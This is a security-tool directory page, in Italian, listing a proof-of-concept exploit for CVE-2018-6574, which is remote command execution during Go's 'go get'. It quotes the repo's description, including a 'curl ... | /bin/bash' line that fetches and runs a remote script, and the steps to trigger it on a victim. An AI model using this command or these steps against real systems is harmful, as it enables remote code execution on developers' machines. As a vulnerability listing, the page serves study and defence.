Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2018-6574 — Exploit proof-of-concept per CVE-2018-6574, che dimostra l'esecuzione remota di comandi nel comando `go get` di Go tramite plugin del compilatore malevoli durante la compilazione del codice sorgente. | Kitploit
Strumenti/GitHubGitHub/frozenkp/cve-2018-6574
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e Formazione
GitHubfrozenkp/cve-2018-6574

CVE-2018-6574

Exploit proof-of-concept per CVE-2018-6574, che dimostra l'esecuzione remota di comandi nel comando `go get` di Go tramite plugin del compilatore malevoli durante la compilazione del codice sorgente.

Vedi Repository
214 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2018-6574

Go prima di 1.8.7, Go 1.9.x prima di 1.9.4 e Go 1.10 pre-release prima di Go 1.10rc2 consentono l'esecuzione di comandi remoti tramite go get durante la compilazione del codice sorgente, sfruttando la funzionalità dei plugin di gcc o clang, poiché gli argomenti -fplugin= e -plugin= non erano stati bloccati. (da mitre)

Comando RCE

Il comando è stato compilato nella libreria dinamica calc_darwin.so. E il comando corrente è curl newton.cycarrier:8002 | /bin/bash. È stato utilizzato come accesso iniziale di un programma. Devi ospitare un server di file sulla porta 8002 e associare l'host al tuo IP.

Come attivarlo?

Per prima cosa, devi installare la versione richiesta di golang sulla vittima. Poi, ospita questo repo su un server git accessibile. Infine, usa il comando go get per scaricare questo repo, e il comando verrà eseguito automaticamente.

Prendi il mio repo come esempio. Devi usare il seguente comando:

root@kitploit:~
go get github.com/frozenkp/CVE-2018-6574

Avviso

Questo repo è solo a scopo di valutazione.

Scarica lo strumento